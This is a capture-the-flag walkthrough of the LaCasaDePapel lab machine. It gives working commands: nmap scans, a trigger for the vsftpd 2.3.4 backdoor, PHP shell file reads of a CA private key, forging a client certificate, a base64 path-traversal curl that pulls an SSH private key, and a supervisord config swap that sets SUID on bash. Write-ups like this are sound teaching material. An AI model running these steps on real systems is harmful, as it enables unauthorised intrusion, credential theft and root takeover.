LaCasaDePapel
Last updated
Was this helpful?
Last updated
Was this helpful?
As always, we start with the enumeration phase, in which we try to scan the machine looking for open ports and finding out services and versions of those opened ports.
The following nmap command will scan the target machine looking for open ports in a fast way and saving the output into a file:
nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.131 -oN allPorts
-sS use the TCP SYN scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.
--min-rate 5000 nmap will try to keep the sending rate at or above 5000 packets per second.
-p- scanning the entire port range, from 1 to 65535.
-T5 insane mode, it is the fastest mode of the nmap time template.
-Pn assume the host is online.
-n scan without reverse DNS resolution.
-oN save the scan result into a file, in this case the allports file.
Now that we know which ports are open, let's try to obtain the services and versions running on these ports. The following command will scan these ports more in depth and save the result into a file:
nmap -sC -sV -p21,22,80,443 10.10.10.131 -oN targeted
-sC performs the scan using the default set of scripts.
-sV enables version detection.
-oN save the scan result into file, in this case the targeted file.
Port 21 is running vsftpd 2.3.4, which has a remote backdoor command execution vulnerability.
searchsploit vsftpd 2.3.4
If we inspect the code, we'll see that all it does is log in with a username containing the :) characters and a random password. This will open a shell on port 6200 of the victim machine.
searchsploit -x unix/remote/49757.py
Let's try it. Log in as the user alfa8sa:) and password alfa8sa into the FTP service.
ftp 10.10.10.131
These credentials won't work, but now we get a shell on port 6200.
rlwrap nc 10.10.10.131 6200
As you can see, we don't get a bash shell, instead, it is a Psy Shell, which is a PHP shell. We could try to run commands on the system with functions such as system(), shell_exec() or exec(), but all these functions are disabled as seen in phpinfo().
phpinfo()
But we can still list directories and get the content of files. There are a few home directories for the following users, which might be useful in the future.
scandir("/home/")
If we type ls, we'll see there is a variable called tokyo.
ls
This variable contains the absolute path of a private key.
show $tokyo
Let's obtain the key, and copy it to our local machine.
echo file_get_contents('/home/nairobi/ca.key')
As we saw earlier, port 443 is open, but it shows an error because it needs a client certificate.
We could check if the private key we got is the same one as the CA certificate of the HTTPS server. First, export the CA certificate as ca.crt.
Now compare the MD5 hashes of both public keys, and both are the same as you can see, which means that the CA certificate is using the ca.key private key.
openssl x509 -in ca.crt -pubkey -noout | md5sum; openssl pkey -in ca.key -pubout | md5sum
Now we could create our own valid client certificate. Create a certificate signing request, then sign it, and convert it to pksc12 so we can import it into the browser.
openssl genrsa -out client.key 4096
openssl req -new -key client.key -out client.csr
openssl x509 -req -in client.csr -CA ca.crt -CAkey ca.key -set_serial 9001 -extensions client -days 9002 -outform PEM -out client.cer
openssl pkcs12 -export -inkey client.key -in client.cer -out client.p12
Now, by checking the client.p12 file, we should see it with lacasadepapel.htb as the issuer.
openssl pkcs12 -info -in client.p12
Import the certificate in Your certificates.
Now, when accessing the HTTPS server, we'll be asked to select the certificate we just imported.
Then, we'll be able to see the PRIVATE AREA.
Each season has several videos which we can download. But the file link is composed of the /file/ directory, followed by a base64 encoded string.
The encoded string is just the relative path to the file.
echo U0VBU09OLTEvMTMuYXZp | base64 -d
So we could try to retrieve the private SSH key of the user running the web server. Copy the key and give it the right permissions.
curl -s -k "https://10.10.10.131/file/$(echo -n '../.ssh/id_rsa' | base64)" > id_rsa; chmod 600 id_rsa
I tried to use the private SSH key with every user found earlier, and it was valid for the professor user.
ssh -i id_rsa professor@10.10.10.131
In the professor home directory, there is a file called memcached.ini.
ls -la
Which contains a command that sets up a node server.
cat memcached.ini
This job is probably executed by root. In fact, root is running the supervisord daemon which is used for this type of jobs.
ps aux | grep supervisor
The idea is to change the command that is being executed. But we can't do it because of the file permissions, which only allow root to modify the file. But, as the file is located in the home directory of the professor user, we can remove the file, and create a new one.
ls -ld .
rm memcached.ini
Now, create the file but with a command which will give the SUID permission to the bash binary when the job gets executed.
echo -e "[program:memcached]\ncommand = chmod +s /bin/bash" > memcached.ini
Once the bash binary gets the SUID permission set, then run bash as the root user, and all we have to do is reap the harvest and take the user and root flags.
ls -l /bin/bash; bash -p
